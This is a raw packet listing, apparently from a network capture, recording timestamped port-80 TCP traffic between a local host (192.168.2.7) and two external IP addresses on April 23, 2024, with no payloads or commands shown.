Apr 23, 2024 09:43:14.344451904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344461918 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344465017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344476938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344490051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344495058 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344501972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344513893 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344516039 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344527006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344538927 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344543934 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344552040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344568968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344578028 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344580889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344594002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344595909 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344605923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344618082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344631910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344638109 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344638109 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344647884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344660044 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344660997 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344674110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344685078 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344691038 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344697952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344710112 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344721079 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344724894 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344733953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344748974 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344769001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344775915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344775915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344782114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344796896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344799995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344810009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344821930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344824076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344835043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344852924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344858885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344866037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344877958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344881058 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344891071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344901085 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344902992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344914913 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344927073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344939947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344939947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344953060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344964981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344969034 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344975948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344988108 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344994068 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.345000029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.345010042 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.345010996 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.345017910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.345032930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.345041037 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.345043898 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.345068932 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.345230103 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.345468998 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.396563053 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.396579027 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.396599054 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.396610975 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.396627903 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.396639109 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.396831036 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.418423891 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.418423891 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:14.574265957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574278116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574289083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574299097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574310064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574322939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574333906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574343920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574353933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574361086 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574364901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574393988 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574418068 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574424982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574435949 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574445963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574455976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574467897 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574489117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574548960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574561119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574572086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574584007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574595928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574609995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574613094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574624062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574626923 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574634075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574647903 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574657917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574668884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574670076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574675083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574690104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574701071 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574722052 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.574841022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.574887037 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575309038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575320959 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575330973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575354099 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575524092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575536013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575565100 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575722933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575735092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575764894 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575865984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575882912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575896978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575908899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575910091 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575922012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575932026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575937033 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575942993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575953960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575965881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.575968027 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575984955 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.575998068 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.577774048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577785969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577797890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577810049 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577828884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.577851057 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.577974081 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577987909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.577999115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578011036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578022957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578032017 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578035116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578047991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578049898 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578063011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578073978 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578073978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578085899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578099012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578109980 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578111887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578120947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578123093 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578133106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578145981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578147888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578156948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578169107 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578180075 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578180075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578192949 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578197002 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578207970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578219891 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578227043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578252077 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578263044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578274965 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578289986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578304052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578318119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578330040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578340054 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578341007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578353882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578366995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578373909 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578381062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578392982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578394890 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578406096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578418016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578422070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578429937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578440905 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578444958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578460932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578464031 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578473091 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578485966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578500032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578500032 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578511953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578524113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578531981 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578535080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578547001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578550100 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578558922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578572035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578577042 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578589916 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578593969 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578625917 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578677893 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578694105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578706026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578716993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578728914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578737974 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578747034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578754902 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578759909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578773022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578787088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578798056 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578798056 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578809977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578813076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578829050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578838110 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578840971 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578852892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578864098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578865051 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578876019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578887939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578893900 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578919888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.578978062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.578996897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579008102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579020023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579029083 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579036951 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579046011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579051971 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579058886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579063892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579071045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579085112 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579094887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579097986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579111099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579121113 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579123020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579133987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579145908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579158068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579164982 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579169035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579180956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579185009 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579191923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579201937 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579212904 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579288006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579302073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579314947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579325914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579333067 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579339027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579344988 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579354048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579365969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579376936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579389095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579396009 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579401016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579413891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579413891 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579425097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579435110 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579436064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579447031 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579448938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579461098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579469919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579476118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579488039 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579499960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579511881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579511881 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579524040 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579530001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579541922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579554081 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579555035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579579115 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579602957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579613924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579631090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579642057 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579653025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579655886 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579665899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579668999 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579679012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579689026 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579691887 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579709053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579715967 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579721928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579734087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579745054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579756975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579763889 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579770088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579780102 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579787016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579792976 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579799891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579812050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579823017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579826117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.579834938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.579847097 CEST	80	49702	176.97.76.106	192.168.2.7
